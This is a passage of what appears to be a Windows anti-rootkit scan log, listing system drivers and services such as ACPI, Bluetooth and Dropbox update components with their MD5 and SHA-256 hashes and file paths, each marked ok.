21:37:10.0270 0x1ac0 1394ohci - ok
21:37:10.0286 0x1ac0 [ 4140B14929C555E9513D59A2EEB5C471, 39A8400B3AA7FB1D8EBE87E65F89881AB23B6AE911BECAEC1FD86C7DADD4F1AA ] 3ware C:\WINDOWS\system32\drivers\3ware.sys
21:37:10.0317 0x1ac0 3ware - ok
21:37:10.0349 0x1ac0 [ D3DB4E3C096EFF74FB6E73E37CB66DD7, 451BE72D50D2316690910B86ACA1EBB5C0F3FE688BAB806EC94BCCB6F3798A0A ] ACPI C:\WINDOWS\system32\drivers\ACPI.sys
21:37:10.0411 0x1ac0 ACPI - ok
21:37:10.0411 0x1ac0 [ 3E5E5DAE5CAEC0209C93D3AD8128D8A0, 5CFA4D715AE8D928EA11F213C5A7B0B1C1705D2A8FF041E0A1988E645E669C54 ] AcpiDev C:\WINDOWS\System32\drivers\AcpiDev.sys
21:37:10.0427 0x1ac0 AcpiDev - ok
21:37:10.0442 0x1ac0 [ F72D7CC7E7A97A09757313F3B4C7E17A, 36E3363380C51A2DB58D3177655A0A75DAA977C00C5A9C60A189068C0AFDC643 ] acpiex C:\WINDOWS\system32\Drivers\acpiex.sys
21:37:10.0442 0x1ac0 acpiex - ok
21:37:10.0458 0x1ac0 [ F04B6F53FBDB2B6B0451AE53DE19F0C9, 41A8C314A46867BAA45CD9666AAF734AD45B74E2033A8E66D93E17CDDAD66578 ] acpipagr C:\WINDOWS\System32\drivers\acpipagr.sys
21:37:10.0474 0x1ac0 acpipagr - ok
21:37:10.0474 0x1ac0 [ C347A6095F3BE417D24F1E1349F4AF0F, 72C9D759BB132985AF55860658DC01F08590A2BD7E976FCF25E1314C5AA1D37B ] AcpiPmi C:\WINDOWS\System32\drivers\acpipmi.sys
21:37:10.0489 0x1ac0 AcpiPmi - ok
21:37:10.0489 0x1ac0 [ 686BFFC47454DD2F58795C2EE891CA9F, 6CC4B6679914742D700A8373DED2DD9A821CA5284D4D73493BA0855DB8E6520A ] acpitime C:\WINDOWS\System32\drivers\acpitime.sys
21:37:10.0505 0x1ac0 acpitime - ok
21:37:10.0520 0x1ac0 [ 9511C276FECBE39FD1E08DC6BA1CF6E9, 0544D666D002BD2BBEAA0F073CD310DDF38EF44B9294D46E9E2F5E237B1787F1 ] AdAppMgrSvc C:\Program Files (x86)\Common Files\Autodesk Shared\AppManager\R1\AdAppMgrSvc.exe
21:37:10.0583 0x1ac0 AdAppMgrSvc - ok
21:37:10.0599 0x1ac0 [ 8D6BA8E7676038A27FD4ECF12CC744B0, F5D59B764DCB4A06A51939533DC7B2391FD68E3979C48939C023A60DCE0D2101 ] AdobeARMservice C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
21:37:10.0614 0x1ac0 AdobeARMservice - ok
21:37:10.0692 0x1ac0 [ FBDA59118E59B3722248C66BAD89CAA9, 11AB83499757E3143834348DE39E85D56EC853071C96337C3ADD8A1E374C6CBC ] ADP80XX C:\WINDOWS\system32\drivers\ADP80XX.SYS
21:37:10.0739 0x1ac0 ADP80XX - ok
21:37:10.0755 0x1ac0 [ AC1928C2F7505BD556C552F153B062AB, B48EA30F76DEA57868CA74CC775DD60257021A3DE10CE101B8BEFA1CE9D22CF4 ] AFD C:\WINDOWS\system32\drivers\afd.sys
21:37:10.0786 0x1ac0 AFD - ok
21:37:10.0802 0x1ac0 [ 1D914C996F2C3134E2344BB74F79BCF6, D27AF01BA29784555AF7D2E89A3A65E81D6AFE1D3C7E8F9367F06D9DF5F88069 ] ahcache C:\WINDOWS\system32\DRIVERS\ahcache.sys
21:37:10.0833 0x1ac0 ahcache - ok
21:37:10.0833 0x1ac0 [ 41856B40EE15F96DEC8755AB01FA3CF7, 33C3C899AF9CA15BE5A4CF097FF43DF3F0DBA0E48B6F1E28AE3E76AD76A1C361 ] AJRouter C:\WINDOWS\System32\AJRouter.dll
21:37:10.0849 0x1ac0 AJRouter - ok
21:37:10.0849 0x1ac0 [ F485CA5559DB37A4882467A4F7D58BEA, A1C648EFE12A5A3356BC0949372ADD0FF0CA2F5A8F992EB71C87E9C0D5C92BB2 ] ALG C:\WINDOWS\System32\alg.exe
21:37:10.0880 0x1ac0 ALG - ok
21:37:10.0880 0x1ac0 [ 9C39FBA94FFEF04561D13ED0D1B50DD0, 53FA118DEF37F0BA6030B9CB4C17019E6B5934941514756D66143B7BB66D7CA1 ] AmdK8 C:\WINDOWS\System32\drivers\amdk8.sys
21:37:10.0911 0x1ac0 AmdK8 - ok
21:37:10.0911 0x1ac0 [ 395D56FA2E22A10AE4774440D086F559, 24D7CBE9B82DC8900D9A5E345347FEC330D47FDBD1517A2AC10218BA2A9DFAA9 ] AmdPPM C:\WINDOWS\System32\drivers\amdppm.sys
21:37:10.0927 0x1ac0 AmdPPM - ok
21:37:10.0942 0x1ac0 [ EB729A9ADCB9F9C406B533F95E2F67D4, EDCB8E39C503FF30ECB82F368242179E2788C12B4FD9B557F38380A934E7D8E7 ] amdsata C:\WINDOWS\system32\drivers\amdsata.sys
21:37:10.0958 0x1ac0 amdsata - ok
21:37:10.0958 0x1ac0 [ 3B5C5C696F33FE61F1922533B03B9316, C9BAAA9B02547C66A276A31958DFD2A289C5963A4EE3FF306535565240D816CC ] amdsbs C:\WINDOWS\system32\drivers\amdsbs.sys
21:37:10.0974 0x1ac0 amdsbs - ok
21:37:10.0989 0x1ac0 [ A7D45A303FF8A9493C96C4B804051E6E, 6074C264876A398039D3F89905A486ABA5BDACA038B79920A34323B38CFCB358 ] amdxata C:\WINDOWS\system32\drivers\amdxata.sys
21:37:10.0989 0x1ac0 amdxata - ok
21:37:11.0005 0x1ac0 [ C7F9F91698572CF9EDC18EDDE345BF97, 07C02E275686C2AB165EF37825F6D63AA9AAC08FD29878FEF665353DF0C7D23A ] AppHostSvc C:\WINDOWS\system32\inetsrv\apphostsvc.dll
21:37:11.0020 0x1ac0 AppHostSvc - ok
21:37:11.0036 0x1ac0 [ 5180537517C27375B1F2CB37ED599FAF, 121BF0E3BDE068CC1E1E9B24DC334BA29348725E9BFB790699E4CC66664A4C3D ] AppID C:\WINDOWS\system32\drivers\appid.sys
21:37:11.0052 0x1ac0 AppID - ok
21:37:11.0052 0x1ac0 [ F7FEBF66A705F18DC063DFD259F15102, 394DA8A7355573C4D81C375450DF5C5B2FA6360E246B06FDE8E7F9ADF21360FA ] AppIDSvc C:\WINDOWS\System32\appidsvc.dll
21:37:11.0083 0x1ac0 AppIDSvc - ok
21:37:11.0083 0x1ac0 [ 13D7FEA71091D1EAD8ADDD10BFFEA06D, A707CAC76CBF0334E2FCE3220147B382F5E44DEF9E23DD459CF7C40F27771695 ] Appinfo C:\WINDOWS\System32\appinfo.dll
21:37:11.0099 0x1ac0 Appinfo - ok
21:37:11.0099 0x1ac0 [ EAF36A714E16A69B8B4ED7591CBA77B6, 11FE2A5D991FB8AF78F4E78FB6DF02005EC5404DC298FE2D4E7774BB0011AB52 ] applockerfltr C:\WINDOWS\system32\drivers\applockerfltr.sys
21:37:11.0130 0x1ac0 applockerfltr - ok
21:37:11.0145 0x1ac0 [ 290469FC9FDE400248DA3E528E729BC2, D9ABBEB76673D136698AA2F53C8EB1EAFBBDE365ACCA9AE348523B346143CA9C ] AppMgmt C:\WINDOWS\System32\appmgmts.dll
21:37:11.0177 0x1ac0 AppMgmt - ok
21:37:11.0192 0x1ac0 [ 1C8DA5C681B603BBC893D50C5D643504, D38EDDB67C993498761978D5DC3DB648E20CB2CA16BA66A8629B16EAA04519EA ] AppReadiness C:\WINDOWS\system32\AppReadiness.dll
21:37:11.0224 0x1ac0 AppReadiness - ok
21:37:11.0255 0x1ac0 [ 9CEB98E9BB0B9C4C9C6C6C248480BE00, 064F06B707956502FE34435AE4C2BCD328056786FF081D37D06B7456DAB6E51D ] AppVClient C:\WINDOWS\system32\AppVClient.exe
21:37:11.0317 0x1ac0 AppVClient - ok
21:37:11.0317 0x1ac0 [ 2D2DF2463FACFBF2FEE39DCCDF49D1B5, F083C1B5B2284AB818431ECC6C9A61EBAFA241840727B97DD0E3B4FF0CBD07C5 ] AppvStrm C:\WINDOWS\system32\drivers\AppvStrm.sys
21:37:11.0333 0x1ac0 AppvStrm - ok
21:37:11.0333 0x1ac0 [ B86E646CE67FE9D75C0D762B19B465FC, B50C45A06AC6862DB4B183F567D55AE289EB05E6A1B32CC3AEBB6163C4296D79 ] AppvVemgr C:\WINDOWS\system32\drivers\AppvVemgr.sys
21:37:11.0349 0x1ac0 AppvVemgr - ok
21:37:11.0364 0x1ac0 [ 2207D2A001A3C30B825F191CD2A76C91, A43EA8CB9E2D1A1FB2DDC738827514588BFFA420A2D618DBCA55614BE2E3B45D ] AppvVfs C:\WINDOWS\system32\drivers\AppvVfs.sys
21:37:11.0380 0x1ac0 AppvVfs - ok
21:37:11.0505 0x1ac0 [ CC2D94671F2185383AEAEAD8784784CD, 98453192A1203B768F59EEF48EDE9CF0F45BF259F3771B254920E1FC0A8BAF06 ] AppXSvc C:\WINDOWS\system32\appxdeploymentserver.dll
21:37:11.0599 0x1ac0 AppXSvc - ok
21:37:11.0614 0x1ac0 [ 6E456A94B9BD7F6B4758729BCEDE40C3, 2F3146AC960992FA947A8E8C4D5497624A5BC69B7A3EECA117AD599C70DDE8E3 ] arcsas C:\WINDOWS\system32\drivers\arcsas.sys
21:37:11.0614 0x1ac0 arcsas - ok
21:37:11.0630 0x1ac0 [ 6FCFBDF7D820CEB7426D988FA6E3DBA2, BC5C0564AB565F911FC99AD3D8C8FDA61E73BA4387CAAE3AE172DD443C56E617 ] aspnet_state C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe
21:37:11.0645 0x1ac0 aspnet_state - ok
21:37:11.0645 0x1ac0 [ 766F3A7E42AFCF74265FAC78987D1665, 8FE82913DF5CF79B49B28B3CD782AF09FF30585A37473AE3E518A26C5D6453D0 ] AsyncMac C:\WINDOWS\System32\drivers\asyncmac.sys
21:37:11.0661 0x1ac0 AsyncMac - ok
21:37:11.0661 0x1ac0 [ 01733BEEE02E51F712330D5909BD701C, A583B482DBE701A752EDFDEAE2EF16D7160DFEA6077E0C8EF013828E285D960A ] atapi C:\WINDOWS\system32\drivers\atapi.sys
21:37:11.0677 0x1ac0 atapi - ok
21:37:11.0692 0x1ac0 [ 5F9C86F133D50EC14BC247B1408EB339, D5C9DC375B91774E580C128677F36C4A4949FC70C7EE82F573EFC8841C084D18 ] AudioEndpointBuilder C:\WINDOWS\System32\AudioEndpointBuilder.dll
21:37:11.0724 0x1ac0 AudioEndpointBuilder - ok
21:37:11.0739 0x1ac0 [ 18DD15CD20F3AFB8A056B6250CDD4ABE, B17DDF9C79EE51CBF274BB8763935F841CC865168A8C27512290946D053EC332 ] Audiosrv C:\WINDOWS\System32\Audiosrv.dll
21:37:11.0786 0x1ac0 Audiosrv - ok
21:37:11.0802 0x1ac0 [ 6086B5EE0DA4600B2EC2725D82DEB74E, C67CA7021D710CFDCF62B17A2B2890E61E4F1E3D956312688454FD85738C303F ] AxInstSV C:\WINDOWS\System32\AxInstSV.dll
21:37:11.0817 0x1ac0 AxInstSV - ok
21:37:11.0817 0x1ac0 [ 0914A5E66C0775CE11960452A6434FEC, 978C1E20023841FBFEF0CEAFE09EDB679612C8E5986C6E40C1F6D0835112D13E ] b06bdrv C:\WINDOWS\system32\drivers\bxvbda.sys
21:37:11.0849 0x1ac0 b06bdrv - ok
21:37:11.0849 0x1ac0 [ F8129321B1874D4386F7FEB754BC3380, 7264E7E2A339E456C0A1A40FDFAE0D202905467400B93FA0700498B86172337F ] BasicDisplay C:\WINDOWS\System32\drivers\BasicDisplay.sys
21:37:11.0864 0x1ac0 BasicDisplay - ok
21:37:11.0864 0x1ac0 [ E2BFD01BD0ECF2BDE9420022147952A4, 7798211996143067787881A1362D07B95CF688E96192E3627D30347C719D40CB ] BasicRender C:\WINDOWS\System32\drivers\BasicRender.sys
21:37:11.0895 0x1ac0 BasicRender - ok
21:37:11.0895 0x1ac0 [ 739D089777D2B66DBE7201E5EA4BA2D7, 9AD12E18A042C5B8EFB19297BC2E7BD1FEF75A138FEFB64C6BF0261FD3E53AB1 ] bcmfn2 C:\WINDOWS\System32\drivers\bcmfn2.sys
21:37:11.0911 0x1ac0 bcmfn2 - ok
21:37:11.0927 0x1ac0 [ C3B27514035315E3C1FCE64E69E253ED, 03AF100927077AD608C5EA47A17081CEA849F44C471AF978F410B83E2ABA5AE7 ] BDESVC C:\WINDOWS\System32\bdesvc.dll
21:37:11.0974 0x1ac0 BDESVC - ok
21:37:11.0989 0x1ac0 [ ED03D2ACE378C9EB8BB957ABBD85B951, E9AE3025DC4956B736651B20AEA665909C2B468F9AE3E317F545DD4EEEA7D9E8 ] Beep C:\WINDOWS\system32\drivers\Beep.sys
21:37:12.0005 0x1ac0 Beep - ok
21:37:12.0036 0x1ac0 [ 1FDC6CB56572203E6F4BF4E3FB30B886, 81D5C77C823DC078EEEB2DABEE5203D542C824E04FEDD96AA58F96037C065155 ] BFE C:\WINDOWS\System32\bfe.dll
21:37:12.0099 0x1ac0 BFE - ok
21:37:12.0130 0x1ac0 [ 5C0D4DBACB90D9ECE77907F4F6CF9EF6, FC29F03FB7E58A9ED17A34BC2D8E39533070B8B23D1A110622C3A213BF48CD2D ] BITS C:\WINDOWS\System32\qmgr.dll
21:37:12.0208 0x1ac0 BITS - ok
21:37:12.0208 0x1ac0 [ D0C542D44800D6600ED04755F5106DE9, FDFCD904C449F3F22FEF5114037E74C092A6F08F93705C79E5AC4DA5BA3486EE ] blackberryncm C:\WINDOWS\System32\drivers\blackberryncm6_AMD64.sys
21:37:12.0224 0x1ac0 blackberryncm - ok
21:37:12.0224 0x1ac0 [ 2342B8619193B0D9FAC0D02C69DCE74A, 06A1512C9750ACD154DE8873DE6628355B7195759CE54FA96097EA6D56BE320E ] bowser C:\WINDOWS\system32\DRIVERS\bowser.sys
21:37:12.0239 0x1ac0 bowser - ok
21:37:12.0255 0x1ac0 [ DD459140CBD075DCFA898097327DB8EB, 8EB685107F06566BC7516F6921547844F1E05A6CD3F0EE80E449638302F46F97 ] BrokerInfrastructure C:\WINDOWS\System32\bisrv.dll
21:37:12.0286 0x1ac0 BrokerInfrastructure - ok
21:37:12.0302 0x1ac0 [ 9C7F445B018AB4744B6E0C657B5D1833, 83D04F5E3D4BA46BBD8A67764A60F5731F86B0BE3A85C2858E002ABCC362F592 ] Browser C:\WINDOWS\System32\browser.dll
21:37:12.0317 0x1ac0 Browser - ok
21:37:12.0317 0x1ac0 [ AEABEB30B5015C635D615D4225FA21D6, 37514D769682A6EF6C0A8CA29F662789DBC4D6F00C0DF1B3E80D8CD5D1C2ADFC ] BthA2DP C:\WINDOWS\system32\drivers\BthA2DP.sys
21:37:12.0349 0x1ac0 BthA2DP - ok
21:37:12.0349 0x1ac0 [ AF57F0B0E284BE06860A7B701341324D, F94E44C777FDC049158B7BF73DAFCDB103D08493AC898D1C928771650F664412 ] BthAvrcpTg C:\WINDOWS\System32\drivers\BthAvrcpTg.sys
21:37:12.0364 0x1ac0 BthAvrcpTg - ok
21:37:12.0364 0x1ac0 [ 4C0FCF1BF33A706D2D23C122D5AF990C, 8FF78C6ABF1DB8D9EF318D2C71EA29E65EC80BCA24BC53CE1F521182733383CC ] BthEnum C:\WINDOWS\system32\DRIVERS\BthEnum.sys
21:37:12.0380 0x1ac0 BthEnum - ok
21:37:12.0380 0x1ac0 [ E3E11ADC7D01BC025934CB7B6C8A108A, 178399E7161BB39DCDC279E36CE255CF40DCEB4796887AE1C5CEF0BE9F81C6B3 ] BthHFAud C:\WINDOWS\system32\DRIVERS\BthHfAud.sys
21:37:12.0395 0x1ac0 BthHFAud - ok
21:37:12.0395 0x1ac0 [ 729CC10B1658178F0F009FE0E9159281, B0F692CAB2BE47415C8A8CCCE8D53CDDF2B70518536ACF91CF96D74ADD04AF9C ] BthHFEnum C:\WINDOWS\System32\drivers\bthhfenum.sys
21:37:12.0411 0x1ac0 BthHFEnum - ok
21:37:12.0411 0x1ac0 [ 336A9C0254A0178ED50281B6EDF5B836, C9C454C6EC4FF5897B1873A7E90D1CE8122E43783E978A570CEA75E15F65DE97 ] bthhfhid C:\WINDOWS\System32\drivers\BthHFHid.sys
21:37:12.0427 0x1ac0 bthhfhid - ok
21:37:12.0442 0x1ac0 [ D8428BEF4033C7BFCD981074E2318F89, 9C0692F8387BAD94CCA4E36B59701A7A7B8FDCB5377B4C2CA75424583835E112 ] BthHFSrv C:\WINDOWS\System32\BthHFSrv.dll
21:37:12.0458 0x1ac0 BthHFSrv - ok
21:37:12.0458 0x1ac0 [ 096C2A149591410A44F1C6CBE4866729, 4ED981A9AA10979C305DEC6E02DD0FF445C64055B5493007BDD5283B4626C0B9 ] BthLEEnum C:\WINDOWS\system32\DRIVERS\Microsoft.Bluetooth.Legacy.LEEnumerator.sys
21:37:12.0474 0x1ac0 BthLEEnum - ok
21:37:12.0474 0x1ac0 [ 5428242193611BF91DDBF4F58900A55A, 91D59B0D0C7CA3DBBA8CA7CAD1E24845A224F451FC1880BE8CB7C1585AC79080 ] BTHMODEM C:\WINDOWS\System32\drivers\bthmodem.sys
21:37:12.0489 0x1ac0 BTHMODEM - ok
21:37:12.0489 0x1ac0 [ E39223EAA36AC546A03ABE213C960A37, D1CFCC3BE2DD76BAE1EA927E9F32BD178D5C5593A4CD34E81038BB692957894E ] BthPan C:\WINDOWS\System32\drivers\bthpan.sys
21:37:12.0505 0x1ac0 BthPan - ok
21:37:12.0552 0x1ac0 [ 622833A26A27F15F42CE0888B1C70472, 9EED4C69DD955AE591270F0E371BEA256AA6DD9C527231BAD191FF3ED3A0826E ] BTHPORT C:\WINDOWS\system32\DRIVERS\BTHport.sys
21:37:12.0630 0x1ac0 BTHPORT - ok
21:37:12.0630 0x1ac0 [ 6927D295017E9F1A5D655A8F3A122672, 4B686C93056924580390440B49C721BD9039D5C972994D8EA96CA848B786B693 ] bthserv C:\WINDOWS\system32\bthserv.dll
21:37:12.0645 0x1ac0 bthserv - ok
21:37:12.0661 0x1ac0 [ FA5CE6301192DD6ED4AA747B2C88FD42, F06A7748FCB6BBF0BB0A8348F505A1703EF2D1B59DC5BA6B600951200463F876 ] BTHUSB C:\WINDOWS\system32\DRIVERS\BTHUSB.sys
21:37:12.0661 0x1ac0 BTHUSB - ok
21:37:12.0677 0x1ac0 [ 102CAA11BA89290D48FBFD2E04274BA0, 9C6786AD6C8BE5AF7538BAD553C401B0D7443E533CDE59E975CF3E07EF262F0C ] buttonconverter C:\WINDOWS\System32\drivers\buttonconverter.sys
21:37:12.0692 0x1ac0 buttonconverter - ok
21:37:12.0692 0x1ac0 [ 029434AC0A3935F9125ABBD08BF7C30B, 742338B882488CA83F502ACEBFEDC2783B8D9D6C391FE1088988276315A065F6 ] CAD C:\WINDOWS\System32\drivers\CAD.sys
21:37:12.0708 0x1ac0 CAD - ok
21:37:12.0708 0x1ac0 [ 307AE8BC9B45772DA02FB952A1D86C35, 4983AC71C8E164D9E6669D345925B4FBEDD0A0A4566887E7ECC56C996B66DBD4 ] CapImg C:\WINDOWS\System32\drivers\capimg.sys
21:37:12.0724 0x1ac0 CapImg - ok
21:37:12.0739 0x1ac0 [ B6E5AD7C83A5254DEE9D86023C0E5A81, 40F297406A025378A6273535475C1FF8C99BC6502B17C0E161131DA754D7974B ] cdfs C:\WINDOWS\system32\DRIVERS\cdfs.sys
21:37:12.0755 0x1ac0 cdfs - ok
21:37:12.0770 0x1ac0 [ A0E5905465CBCCB63FE915F5B08752A8, 435B39A8B1684FFE9F2720A2CD11AF5A5F55E701709939756322C2CD6A22E0FA ] CDPSvc C:\WINDOWS\System32\CDPSvc.dll
21:37:12.0849 0x1ac0 CDPSvc - ok
21:37:12.0864 0x1ac0 [ 618DA70D0D90DF3602259C1B121794DD, D2AF7967DE38F3B7C10824A1C900A145F45C57C0F179753A85989406600C4279 ] CDPUserSvc C:\WINDOWS\System32\CDPUserSvc.dll
21:37:12.0942 0x1ac0 CDPUserSvc - ok
21:37:12.0958 0x1ac0 [ ABE77AD954BC3D72F559CF0C381E50BC, D0F24B023D7CADD4893AAF223A9BAC00B2C58D552E0C314B506C01767FB74133 ] cdrom C:\WINDOWS\System32\drivers\cdrom.sys
21:37:12.0974 0x1ac0 cdrom - ok
21:37:12.0989 0x1ac0 [ 0EC94DA356D89CACD89B6E139E4D0A7D, 2F887681FDD5AB787154403E34623B1DFB61C70DAE5E2BFF1565E100F228870B ] CertPropSvc C:\WINDOWS\System32\certprop.dll
21:37:13.0020 0x1ac0 CertPropSvc - ok
21:37:13.0036 0x1ac0 [ 05EA22CFC40EDE05BF6E3BC782E5204C, F0C9C692FC31387E9D19426D3253317B6BA86D7118E3884C11E3287695006443 ] cht4iscsi C:\WINDOWS\system32\drivers\cht4sx64.sys
21:37:13.0083 0x1ac0 cht4iscsi - ok
21:37:13.0177 0x1ac0 [ 863E1C9F6750446DFB9EDCAEC3531367, 88C5EE76FD85640EB1440DEFC7B6CB918E18DC09507BA91FAE285370B8C7D56A ] cht4vbd C:\WINDOWS\System32\drivers\cht4vx64.sys
21:37:13.0255 0x1ac0 cht4vbd - ok
21:37:13.0255 0x1ac0 [ 3E416539352B007AD0610BF34AC15D31, E2041129770B24AE95C5EC4B507477C72DFE8CB08D412E2621BF67207F9DEB8C ] circlass C:\WINDOWS\System32\drivers\circlass.sys
21:37:13.0270 0x1ac0 circlass - ok
21:37:13.0286 0x1ac0 [ 616E1ED94FA7F96D429D985FDB203D2E, EA681C442AA0F7D424C8DABD8D1C14653E61BDE740C0BC4C6C308B5FB4FE67AA ] CldFlt C:\WINDOWS\system32\drivers\cldflt.sys
21:37:13.0333 0x1ac0 CldFlt - ok
21:37:13.0349 0x1ac0 [ 96C01F97576D2542FCBD28E13C8CC6A1, 98E2501197B97399EB1F7C8AA96B5696931736E44400314E768A6C029B9E1C62 ] CLFS C:\WINDOWS\system32\drivers\CLFS.sys
21:37:13.0364 0x1ac0 CLFS - ok
21:37:13.0395 0x1ac0 [ FA57DEAD00DF87AF861B5FAF253ED3B9, 81BD591549CC1F2312AE85A455B28D051FC7D3A54D6371A634DF09DF8A00F952 ] ClipSVC C:\WINDOWS\System32\ClipSVC.dll
21:37:13.0442 0x1ac0 ClipSVC - ok
21:37:13.0442 0x1ac0 [ 5118CFC33BBB51C7E3ED441B7085AD26, 8D33864FF750926C4B95827FFAD24C558DE8A90FC5B2663084DEAB5ADBBFAFD2 ] clreg C:\WINDOWS\System32\drivers\registry.sys
21:37:13.0458 0x1ac0 clreg - ok
21:37:13.0458 0x1ac0 [ 232F3A3AC3A2FB32C5C46503A6517073, 9E0232E095471E6C8825E870F5842838F1AE515E56410F6A5CC3D58A9A4AF33A ] CmBatt C:\WINDOWS\System32\drivers\CmBatt.sys
21:37:13.0474 0x1ac0 CmBatt - ok
21:37:13.0489 0x1ac0 [ 3413CE81E02C091F33C4C3DD3071630F, 4758A2BB2FD453E9867C04CC420D12B279BB97E3C4E664A7058EA5F1EC63D04C ] CNG C:\WINDOWS\system32\Drivers\cng.sys
21:37:13.0505 0x1ac0 CNG - ok
21:37:13.0520 0x1ac0 [ E1BFF774FF67CA951A5DFF0E104FB132, 68809C4B72C54CEDE3AD33F5634E15A0225A67B391F9012EC7CEBA8AFC6EC3D5 ] cnghwassist C:\WINDOWS\system32\DRIVERS\cnghwassist.sys
21:37:13.0520 0x1ac0 cnghwassist - ok
21:37:13.0630 0x1ac0 [ F97961FD74E83E3E96DB45B69B33B157, 5F77EEEBC9BCEE0C888541B2EF728490CDD6D72F60B29619D0BE58ECF11CD67D ] CodeMeter.exe C:\Program Files (x86)\CodeMeter\Runtime\bin\CodeMeter.exe
21:37:13.0692 0x1ac0 CodeMeter.exe - ok
21:37:13.0708 0x1ac0 [ DFDAEDB857BC18764F0D8ECDCC3C1499, AE12E908BAF53C605A17A9FB1AFD6BFBEC75EBE45D893541281473C197C71FED ] CompositeBus C:\WINDOWS\System32\DriverStore\FileRepository\compositebus.inf_amd64_de4c68ea4fb1be53\CompositeBus.sys
21:37:13.0708 0x1ac0 CompositeBus - ok
21:37:13.0724 0x1ac0 COMSysApp - ok
21:37:13.0724 0x1ac0 [ 04532711732BE9DBC364E88E4A9EC18A, FCEB1F486E146A3FE7307397C1EB6760BFD8A327545F81C546F7134B08615B9E ] condrv C:\WINDOWS\system32\drivers\condrv.sys
21:37:13.0755 0x1ac0 condrv - ok
21:37:13.0786 0x1ac0 [ 605D4C2E374197FEA0D0BC9C41E5945A, 0E655CEBB86DECC76153776AA4B78B7B7457ABA899B3437F76A7BE09F08752BB ] CoreMessagingRegistrar C:\WINDOWS\system32\coremessaging.dll
21:37:13.0833 0x1ac0 CoreMessagingRegistrar - ok
21:37:13.0849 0x1ac0 [ 75C568E62A2BD89A869C34119A66D19B, 2954F25E511947728FE50AA76ACECE0B6952D1984301027F499E2F3DAAEB65D3 ] cphs C:\WINDOWS\SysWow64\IntelCpHeciSvc.exe
21:37:13.0864 0x1ac0 cphs - ok
21:37:13.0864 0x1ac0 [ 1F7F1A15B807BC7B241BB2FEEA79BC92, D756E2247757C274F3470B46FCDBB63317C05E8E66FDA9DB7ABF3A6820933D4C ] CryptSvc C:\WINDOWS\system32\cryptsvc.dll
21:37:13.0895 0x1ac0 CryptSvc - ok
21:37:13.0895 0x1ac0 [ EFB2A77F0CD1B8A79899C1D37B01CA86, 9FA32E0853FA93513ACA2CD4203DE8BC22268ABCA4BBDB366307C106F4FD5917 ] CSC C:\WINDOWS\system32\drivers\csc.sys
21:37:13.0927 0x1ac0 CSC - ok
21:37:13.0942 0x1ac0 [ F010BDED808E86E1046F08865C11EDF2, 48FE0D176F7FA1F04685C0A1FD4FFB6464B6B88883D7D50E05C9C6C0636E895A ] CscService C:\WINDOWS\System32\cscsvc.dll
21:37:13.0974 0x1ac0 CscService - ok
21:37:13.0974 0x1ac0 [ F51953EC4B9AACD92A3B3CE66E05CEF4, D39C9696213F53F89209000F245AC178B342A84E46EE766B634BB8DB86A26BB8 ] dam C:\WINDOWS\system32\drivers\dam.sys
21:37:13.0989 0x1ac0 dam - ok
21:37:13.0989 0x1ac0 [ A1F58FFF448E4099297D6EE0641D4D0E, 47839789332AAF8861F7731BF2D3FBB5E0991EA0D0B457BB4C8C1784F76C73DC ] dbupdate C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
21:37:14.0005 0x1ac0 dbupdate - ok
21:37:14.0005 0x1ac0 [ A1F58FFF448E4099297D6EE0641D4D0E, 47839789332AAF8861F7731BF2D3FBB5E0991EA0D0B457BB4C8C1784F76C73DC ] dbupdatem C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
21:37:14.0020 0x1ac0 dbupdatem - ok
21:37:14.0020 0x1ac0 [ 8FC11CF02CDF8C958EACCD8CC6479BE6, 451DF418FE72716B4AE75F36D77810F66046ABE4E870504AE4052D53121A526E ] DbxSvc C:\WINDOWS\system32\DbxSvc.exe
21:37:14.0020 0x1ac0 DbxSvc - ok
21:37:14.0052 0x1ac0 [ 0E79A4C76CAAA0CFE9CA42C13E5AA086, C4D90EDA54216CC7897128D39517E4E18195BF28254796C6D0684E2C7DB90642 ] DcomLaunch C:\WINDOWS\system32\rpcss.dll
21:37:14.0099 0x1ac0 DcomLaunch - ok
21:37:14.0099 0x1ac0 [ 1175E107082287A58A756239F48E1A73, 0DB2017061D94FAC95CEBD7C4729E42018A92698D72CEE3EA412A9D14DB8D552 ] defragsvc C:\WINDOWS\System32\defragsvc.dll
21:37:14.0130 0x1ac0 defragsvc - ok
21:37:14.0145 0x1ac0 [ BBCAC50027D030E07EC7E5C36469FAFF, FEF39659F21D2AE676E4882FBAF5A881C534BB7EA26E5EFF9F7B5F8B952D6532 ] DeviceAssociationService C:\WINDOWS\system32\das.dll
21:37:14.0177 0x1ac0 DeviceAssociationService - ok
21:37:14.0177 0x1ac0 [ A2BACEBAC01BE7A6656B454E75C23262, C2C168718A341D48679AC4CA8005BD06E9F1F0D1F7C72D3C30A7A8CE1F665A43 ] DeviceInstall C:\WINDOWS\system32\umpnpmgr.dll
21:37:14.0192 0x1ac0 DeviceInstall - ok
21:37:14.0208 0x1ac0 [ 5B84093D490A6B060C8BE60BA52C876F, D34A854418A66529B18313A50E6D7EAB982611AD9AB0335245AE764FE0602C22 ] DevicesFlowUserSvc C:\WINDOWS\System32\DevicesFlowBroker.dll
21:37:14.0239 0x1ac0 DevicesFlowUserSvc - ok
21:37:14.0255 0x1ac0 [ F08F70BBD833BAA3BF0D5E500CBEE6CC, 8BB99E6D96CB8B25036549030986EC267C26BF1FC66E4EB00A3E41FE3BB5DE70 ] DevQueryBroker C:\WINDOWS\system32\DevQueryBroker.dll
21:37:14.0270 0x1ac0 DevQueryBroker - ok
21:37:14.0270 0x1ac0 [ 185A4519B7764F4DEF714D890A7A9FD2, 9805D9DB42D11582583EA3F0FFEE9EF2B0C536DA99A9A3D3863B2669B1CC34A7 ] Dfsc C:\WINDOWS\system32\Drivers\dfsc.sys
21:37:14.0286 0x1ac0 Dfsc - ok
21:37:14.0302 0x1ac0 [ BC5188B3F35BB8070888441A2A740465, 05C18A3DC1BD96C6751E76DBF57C47E526A1F9DF5E013B20B69EA0159CD6CE56 ] Dhcp C:\WINDOWS\system32\dhcpcore.dll
21:37:14.0333 0x1ac0 Dhcp - ok
21:37:14.0333 0x1ac0 [ 5DF493C7954890EEC65CC2A21D479F76, 67087AAAC2AF93F265077AA392444E32DC299918A843A8AECFBE73636A5F2314 ] diagnosticshub.standardcollector.service C:\WINDOWS\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
